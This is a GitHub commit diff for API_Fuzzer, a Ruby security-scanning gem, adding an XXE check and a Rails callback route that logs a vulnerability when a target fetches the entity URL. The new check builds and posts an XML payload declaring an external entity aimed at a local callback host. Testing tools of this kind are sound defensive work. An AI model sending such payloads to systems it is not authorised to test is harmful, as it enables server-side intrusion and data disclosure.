File tree Expand file tree Collapse file tree 8 files changed +61
-0
lines changed
Expand file tree Collapse file tree 8 files changed +61
-0
lines changed Original file line number Diff line number Diff line change @@ -28,6 +28,7 @@ Gem::Specification.new do |spec|
2828 spec . require_paths = [ "lib" ]
2929
3030 spec . add_dependency 'http' , '~> 2.0'
31+ spec . add_dependency 'activesupport'
3132 spec . add_development_dependency "bundler" , "~> 1.12"
3233 spec . add_development_dependency "rake" , "~> 10.0"
3334 spec . add_development_dependency "minitest" , "~> 5.0"
Original file line number Diff line number Diff line change @@ -3,6 +3,7 @@ source 'https://rubygems.org'
33# Specify your gem's dependencies in API_Fuzzer.gemspec
44
55gem 'http'
6+ gem 'builder'
67
78group :development do
89 gem 'byebug'
Original file line number Diff line number Diff line change 1+ class PingController < ActionController ::Base
2+ def index
3+ sha = params [ :id ]
4+ scan = Scan . find_by_sid ( sha )
5+ scan . vulnerabilities . create! (
6+ status : 'HIGH' ,
7+ class_type : 'Vulnerability' ,
8+ description : 'Possible XXE vulnerability in #{scan.url}' ,
9+ value : params [ :body ]
10+ ) if scan
11+ render :ok
12+ end
13+ end
Original file line number Diff line number Diff line change 1+ API_Fuzzer ::Engine . routes . draw do
2+ get '/ping/:id' => 'ping#index'
3+ end
Original file line number Diff line number Diff line change 55require 'API_Fuzzer/sql_blind_check'
66require 'API_Fuzzer/xss_check'
77require 'API_Fuzzer/request'
8+ require 'API_Fuzzer/engine'
89
910module API_Fuzzer
1011 # Scans all the checks
@@ -16,6 +17,7 @@ def self.scan(options = {})
1617 vulnerabilities << API_Fuzzer ::XssCheck . scan ( options )
1718 vulnerabilities << API_Fuzzer ::SqlCheck . scan ( options )
1819 vulnerabilities << API_Fuzzer ::SqlBlindCheck . scan ( options )
20+ API_Fuzzer ::XxeCheck . scan ( options )
1921 vulnerabilities . uniq . flatten
2022 end
2123
Original file line number Diff line number Diff line change 1+ module API_Fuzzer
2+ class Engine < ::Rails ::Engine ; end
3+ end
Original file line number Diff line number Diff line change @@ -10,6 +10,7 @@ def send_api_request(options = {})
1010 @params = options . delete ( :params ) || { }
1111 @method = options . delete ( :method ) || :get
1212 @json = options . delete ( :json ) ? true : false
13+ @body = options . delete ( :body ) ? true : false
1314 @request = set_cookies ( options )
1415 send_request
1516 end
@@ -56,6 +57,8 @@ def self.set_params
5657 { 'json' => @params }
5758 elsif method_get?
5859 { 'params' => @params }
60+ elsif @body
61+ { 'body' => @params }
5962 else
6063 { 'form' => @params }
6164 end
Original file line number Diff line number Diff line change 1+ require 'API_Fuzzer/vulnerability'
2+ require 'API_Fuzzer/error'
3+ require 'API_Fuzzer/request'
4+ require 'byebug'
5+
6+ module API_Fuzzer
7+ class XxeCheck
8+
9+ def self . scan ( options = { } )
10+ @url = options [ :url ] || nil
11+ @params = options [ :params ] || ''
12+ @scan_hash = options [ :scan ]
13+ fuzz_xml_params
14+ end
15+
16+ def self . fuzz_xml_params
17+ return unless @params
18+ body = @params . gsub ( /\> \s *[a-zA-Z0-9]*\s *\< \/ / , '>&xxe;<' )
19+ payload = <<-XXEPAYLOAD
20+ <?xml version="1.0" encoding="ISO-8859-1"?>
21+ <!DOCTYPE foo [
22+ <!ELEMENT foo ANY >
23+ <!ENTITY xxe SYSTEM "http://127.0.0.1:3000/yoxxe" >]>
24+ XXEPAYLOAD
25+ payload << body
26+
27+ API_Fuzzer ::Request . send_api_request (
28+ url : @url ,
29+ params : payload ,
30+ body : true ,
31+ method : :post
32+ )
33+ end
34+ end
35+ end
You can’t perform that action at this time.
0 commit comments